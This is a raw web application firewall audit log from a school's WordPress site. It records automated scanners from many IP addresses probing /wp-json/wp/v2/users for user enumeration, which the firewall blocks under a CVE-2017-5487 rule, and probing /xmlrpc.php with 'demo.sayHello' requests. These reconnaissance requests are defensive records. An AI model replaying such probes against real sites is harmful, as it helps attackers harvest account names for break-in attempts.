--fceb8623-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746322980761455 5218 (- - -) Stopwatch2: 1746322980761455 5218; combined=4009, p1=438, p2=3308, p3=29, p4=30, p5=128, sr=68, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fceb8623-Z-- --9a4e5664-A-- [04/May/2025:08:43:05 +0700] aBbGKdsVQyl9V2B8Pt-wUwAAAFM 103.236.140.4 35098 103.236.140.4 8181 --9a4e5664-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9a4e5664-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a4e5664-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746322985637513 3223 (- - -) Stopwatch2: 1746322985637513 3223; combined=1389, p1=541, p2=817, p3=0, p4=0, p5=30, sr=166, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a4e5664-Z-- --6ec9494e-A-- [04/May/2025:08:43:11 +0700] aBbGL2JEE9ao5dcyYWnuhAAAAJc 103.236.140.4 35104 103.236.140.4 8181 --6ec9494e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6ec9494e-C-- demo.sayHello --6ec9494e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ec9494e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746322991312070 6761 (- - -) Stopwatch2: 1746322991312070 6761; combined=4876, p1=652, p2=3963, p3=40, p4=43, p5=105, sr=120, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ec9494e-Z-- --27145f7d-A-- [04/May/2025:08:43:45 +0700] aBbGUechPF6irSergtv81gAAAMQ 103.236.140.4 35108 103.236.140.4 8181 --27145f7d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --27145f7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27145f7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323025287868 16209 (- - -) Stopwatch2: 1746323025287868 16209; combined=26996, p1=480, p2=998, p3=0, p4=0, p5=12774, sr=74, sw=0, l=0, gc=12744 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27145f7d-Z-- --9eab925d-A-- [04/May/2025:08:43:51 +0700] aBbGV-chPF6irSergtv82AAAAMg 103.236.140.4 35112 103.236.140.4 8181 --9eab925d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9eab925d-C-- demo.sayHello --9eab925d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9eab925d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323031254569 6316 (- - -) Stopwatch2: 1746323031254569 6316; combined=4618, p1=575, p2=3803, p3=44, p4=41, p5=92, sr=70, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9eab925d-Z-- --18a7ec36-A-- [04/May/2025:08:44:28 +0700] aBbGfNsVQyl9V2B8Pt-wVgAAAFY 103.236.140.4 35116 103.236.140.4 8181 --18a7ec36-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --18a7ec36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18a7ec36-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323068801493 3532 (- - -) Stopwatch2: 1746323068801493 3532; combined=1537, p1=518, p2=987, p3=0, p4=0, p5=32, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18a7ec36-Z-- --3e6fee79-A-- [04/May/2025:08:44:33 +0700] aBbGgechPF6irSergtv82wAAAMs 103.236.140.4 35120 103.236.140.4 8181 --3e6fee79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3e6fee79-C-- demo.sayHello --3e6fee79-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e6fee79-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323073461044 5001 (- - -) Stopwatch2: 1746323073461044 5001; combined=3828, p1=528, p2=3087, p3=26, p4=24, p5=95, sr=144, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e6fee79-Z-- --8c543c1e-A-- [04/May/2025:08:44:39 +0700] aBbGh-chPF6irSergtv83QAAAMw 103.236.140.4 35124 103.236.140.4 8181 --8c543c1e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8c543c1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c543c1e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323079661891 2411 (- - -) Stopwatch2: 1746323079661891 2411; combined=1140, p1=409, p2=703, p3=0, p4=0, p5=27, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c543c1e-Z-- --ff24f243-A-- [04/May/2025:08:44:46 +0700] aBbGjuchPF6irSergtv83gAAAM4 103.236.140.4 35128 103.236.140.4 8181 --ff24f243-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.89 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ff24f243-C-- demo.sayHello --ff24f243-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff24f243-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323086133698 6008 (- - -) Stopwatch2: 1746323086133698 6008; combined=4185, p1=567, p2=3391, p3=28, p4=32, p5=98, sr=75, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff24f243-Z-- --d721ba01-A-- [04/May/2025:08:45:02 +0700] aBbGnvnZiHJYHUAF8Qfb3gAAAA0 103.236.140.4 35136 103.236.140.4 8181 --d721ba01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d721ba01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d721ba01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323102634830 3150 (- - -) Stopwatch2: 1746323102634830 3150; combined=1279, p1=421, p2=828, p3=0, p4=0, p5=29, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d721ba01-Z-- --e7f1d926-A-- [04/May/2025:08:45:08 +0700] aBbGpNsVQyl9V2B8Pt-wWAAAAFc 103.236.140.4 35140 103.236.140.4 8181 --e7f1d926-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e7f1d926-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7f1d926-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323108078407 2141 (- - -) Stopwatch2: 1746323108078407 2141; combined=975, p1=341, p2=606, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7f1d926-Z-- --62610863-A-- [04/May/2025:08:45:08 +0700] aBbGpGJEE9ao5dcyYWnuhgAAAIE 103.236.140.4 35142 103.236.140.4 8181 --62610863-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --62610863-C-- demo.sayHello --62610863-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --62610863-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323108097069 5392 (- - -) Stopwatch2: 1746323108097069 5392; combined=4063, p1=528, p2=3325, p3=29, p4=32, p5=88, sr=72, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62610863-Z-- --4029bd4d-A-- [04/May/2025:08:45:17 +0700] aBbGrechPF6irSergtv84QAAANE 103.236.140.4 35148 103.236.140.4 8181 --4029bd4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4029bd4d-C-- demo.sayHello --4029bd4d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4029bd4d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323117074212 5872 (- - -) Stopwatch2: 1746323117074212 5872; combined=4205, p1=544, p2=3440, p3=31, p4=35, p5=92, sr=79, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4029bd4d-Z-- --1e0d4b10-A-- [04/May/2025:08:45:17 +0700] aBbGrfnZiHJYHUAF8Qfb3wAAAA8 103.236.140.4 35150 103.236.140.4 8181 --1e0d4b10-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1e0d4b10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e0d4b10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323117577114 2573 (- - -) Stopwatch2: 1746323117577114 2573; combined=1194, p1=439, p2=729, p3=0, p4=0, p5=26, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e0d4b10-Z-- --4e1f2b7f-A-- [04/May/2025:08:45:27 +0700] aBbGt_nZiHJYHUAF8Qfb4gAAABc 103.236.140.4 35158 103.236.140.4 8181 --4e1f2b7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4e1f2b7f-C-- demo.sayHello --4e1f2b7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e1f2b7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323127021739 5628 (- - -) Stopwatch2: 1746323127021739 5628; combined=4157, p1=513, p2=3416, p3=27, p4=31, p5=99, sr=69, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e1f2b7f-Z-- --65f5675b-A-- [04/May/2025:08:45:32 +0700] aBbGvPnZiHJYHUAF8Qfb5AAAABg 103.236.140.4 35162 103.236.140.4 8181 --65f5675b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --65f5675b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65f5675b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323132144852 2411 (- - -) Stopwatch2: 1746323132144852 2411; combined=1201, p1=414, p2=759, p3=0, p4=0, p5=27, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65f5675b-Z-- --49137342-A-- [04/May/2025:08:45:34 +0700] aBbGvvnZiHJYHUAF8Qfb5QAAABQ 103.236.140.4 35164 103.236.140.4 8181 --49137342-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --49137342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49137342-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323134486485 1915 (- - -) Stopwatch2: 1746323134486485 1915; combined=930, p1=312, p2=592, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49137342-Z-- --75cd4a74-A-- [04/May/2025:08:45:37 +0700] aBbGwechPF6irSergtv84gAAANI 103.236.140.4 35170 103.236.140.4 8181 --75cd4a74-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) 